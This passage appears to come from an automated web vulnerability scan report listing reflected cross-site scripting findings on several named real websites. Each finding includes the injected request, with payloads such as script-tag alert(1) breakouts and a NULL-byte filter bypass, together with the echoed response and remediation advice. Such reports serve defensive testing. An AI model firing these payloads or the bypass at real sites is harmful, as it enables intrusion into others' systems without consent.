<head>
<meta http-equiv
...[SNIP]...
,
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%26ADA=trueab183";alert(1)//884aa7f60f1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes);
...[SNIP]...

3.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d08"%3balert(1)//c9371ab82a8 was submitted in the name of an arbitrarily supplied request parameter. The response below echoes it upper-cased as E8D08";ALERT(1)//C9371AB82A8, the same behaviour as in 3.94: the quote breakout holds, but ALERT(1) is not alert(1) in case-sensitive JavaScript, so verify with a payload that survives upper-casing before relying on this proof of concept.

This proof of concept shows that the JavaScript string can be broken out of; whether arbitrary JavaScript then runs depends on the upper-casing noted above.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Default.aspx?e8d08"%3balert(1)//c9371ab82a8=1 HTTP/1.1
Host: www.chasemilitary.com
Proxy-Connection: keep-alive
Referer: http://www.chasemilitary.com/?8517f%22%3balert(document.cookie)//55b2694a95c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=OVMPLYSilkbyCKKWU; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45; __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.1.10.1296685136

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 00:07:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
'false',
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%26E8D08";ALERT(1)//C9371AB82A8=1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes
...[SNIP]...

3.97. http://www.google.com/advanced_search [hl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the hl request parameter is copied into an inline script. The scanner classified the context as a JavaScript expression not encapsulated in any quotation marks, but the response below shows the reflection inside a single-quoted string passed to google.History.initialize, with the application hex-escaping = and & as \x3d and \x26. The payload bdade(a)d80aea01345 was submitted in the hl parameter and was echoed unmodified.

This behaviour shows that parentheses survive into the returned script, but no full proof of concept for injecting arbitrary JavaScript was found: the payload contains neither a quote nor a backslash, so it does not demonstrate a breakout from the single-quoted string. Examine the application's handling of ' and \ manually before rating this as exploitable, and note the X-XSS-Protection: 1; mode=block response header, a browser-side filter that a working proof of concept would additionally have to get past.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software&hl=enbdade(a)d80aea01345&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
alse,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software\x26amp;hl\x3denbdade(a)d80aea01345\x26amp;prmd\x3divns')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f394a(a)d2919261fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?f394a(a)d2919261fa0=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:08:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?f394a(a)d2919261fa0\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.99. http://www.google.com/advanced_search [prmd parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a960d(a)ecab87e67a8 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software&hl=en&prmd=ivnsa960d(a)ecab87e67a8 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software\x26amp;hl\x3den\x26amp;prmd\x3divnsa960d(a)ecab87e67a8')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.100. http://www.google.com/advanced_search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4db85(a)700ed73b9bc was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software4db85(a)700ed73b9bc&hl=en&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software4db85(a)700ed73b9bc\x26amp;hl\x3den\x26amp;prmd\x3divns')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.101. http://www.google.com/images [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /images

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e290(a)d4e0b417516 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images?q=ipboard+software6e290(a)d4e0b417516&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:11:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software6e290(a)d4e0b417516 - Google Search</title><script>window.google={kEI:"vQBKTbagDIGglAfU_Nz9
...[SNIP]...
location.hash;if(a&&a.indexOf("start")>-1){var b=window.dyn.setResults;window.dyn.setResults=function(){window.dyn.setResults=b}}}v();
}) ();dyn.initialize('\x26prev\x3d/images%3Fq%3Dipboard%2Bsoftware6e290(a)d4e0b417516%26um%3D1%26hl%3Den%26sa%3DN%26tbs%3Disch:1\x26ei\x3dvQBKTbagDIGglAfU_Nz9Dw',0,1);dyn.setResults([]);</script>
...[SNIP]...

3.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.invisionpower.com
Path:   /products/board/features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95e51--><a>1fddadebe75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/board/features/?95e51--><a>1fddadebe75=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=75d748bd55859c58635f5c6022ec9255; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16435

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<!-- ?95e51--><a>1fddadebe75=1 -->
...[SNIP]...

3.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.invisionpower.com
Path:   /products/nexus/features/store.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e722--><a>6ccf7c9b600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/nexus/features/store.php?5e722--><a>6ccf7c9b600=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=afd5acf1c08a7662de6d8859ba720860; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14878

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<!-- store?5e722--><a>6ccf7c9b600=1 -->
...[SNIP]...

3.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jpost.com
Path:   /ArtsAndCulture/FoodAndWine/Article.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 41326><script>alert(1)</script>d2be1bfeaa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1 HTTP/1.1
Host: www.jpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sgl5a4ygdcxxmom2wnek3a45; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 117507
Accept-Ranges: bytes
Cache-Control: private, max-age=420
Age: 0
Expires: Thu, 03 Feb 2011 01:24:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_He
...[SNIP]...
<iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1&amp;layout=button_count&amp;show_faces=true&amp;width=150&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; h
...[SNIP]...

3.105. http://www.learningsolutions.com.hk/index.php [Itemid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learningsolutions.com.hk
Path:   /index.php

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f639"><script>alert(1)</script>217975010b0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_content&task=view&id=7&Itemid=133f639"><script>alert(1)</script>217975010b0 HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:56:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:56:57 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:56:57 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:56:58 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:56:58 GMT
Connection: close
Content-Type: text/html
Content-Length: 32190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...
<a href="http://www.learningsolutions.com.hk/index.php?option=com_content&amp;task=view&amp;id=7&amp;Itemid=133f639"><script>alert(1)</script>217975010b0&amp;lang=en">
...[SNIP]...

3.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdaa0'-alert(1)-'045651d38d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1 HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=378925c14d4a02242aec2; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=378925c14d4a02242aec2; expires=Fri, 04-Feb-2011 01:17:24 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...
ytimes.com.mo/index.php', {
                   parameters: {
                       action: 'comment',
                       cmd: 'proxy',
                       pg: pg,
                       CURRENT_URL: 'http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1',
                       article_id: 21109,
                       template_output: 'box/comments'
                   }
               });
           }
       </script>
...[SNIP]...

3.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007604f"><script>alert(1)</script>840cc046a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7604f"><script>alert(1)</script>840cc046a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/self-directed-investing.aspx?%007604f"><script>alert(1)</script>840cc046a86=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=48fba909101349b2b1f5d2e57c206442; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.7604f"><script>alert(1)</script>840cc046a86=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.108. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [src_cd parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0013948'%3bf91d272c668 was submitted in the src_cd parameter. This input was echoed as 13948';f91d272c668 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%0013948'%3bf91d272c668 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=88bab72aaec248caa0bda82a0753db2b; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'BAC1.13948';f91d272c668'
,'Page' : 'self-directed-investing'
,'preview' : false
};
//]]>
...[SNIP]...

3.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093556"><script>alert(1)</script>754868bc16e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93556"><script>alert(1)</script>754868bc16e in the application's response.

